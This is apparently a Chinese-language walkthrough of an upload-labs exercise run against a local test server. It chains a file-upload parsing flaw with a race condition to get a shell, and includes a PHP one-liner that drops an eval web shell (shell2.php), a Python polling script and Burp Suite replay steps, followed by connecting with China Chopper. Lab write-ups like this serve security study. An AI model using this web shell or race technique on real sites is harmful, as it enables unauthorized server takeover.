访问目标站点,提示如下图所示
查看源码
思路:上传shell.php.7z图片木马配合解析漏洞进行getshell
实验步骤:
图片中php一句话木马代码:<?php fputs(fopen('shell2.php','w'),'<?php @eval($_POST["x"])?>');?>
第一种:使用python脚本
第一步:burpsuite抓包,上传文件名字shell.php.7z,在图片信息最下方是一句话木马:
<?php fputs(fopen('shell2.php','w'),'<?php @eval($_POST["x"])?>');?>
(只要被成功当作PHP文件解析,就会生成shell2.php 文件)
第二步:python脚本打开并运行
python内容:
import requests
url = "http://127.0.0.1/upload-labs/upload/shell.php.7z"
while True:
html = requests.get(url)
if html.status_code == 200:
print("OK")
break
else:
print("NO")
第三步:在python脚本运行后,burpsuite开始无限制重放数据包
直到python脚本出现OK,才关闭burpsuite
第四步:访问生成的shell2.php文件
中国菜刀连接即可
第二种:不使用python脚本
burpsuite与第一种方法一样,无限重放数据包,在无限重放数据包的同时,要一直访问shell.php.7z文件
直到出现如下界面,说明竞争成功,成功执行shell.php.7z生成shell2.php 文件
中国菜刀连接即可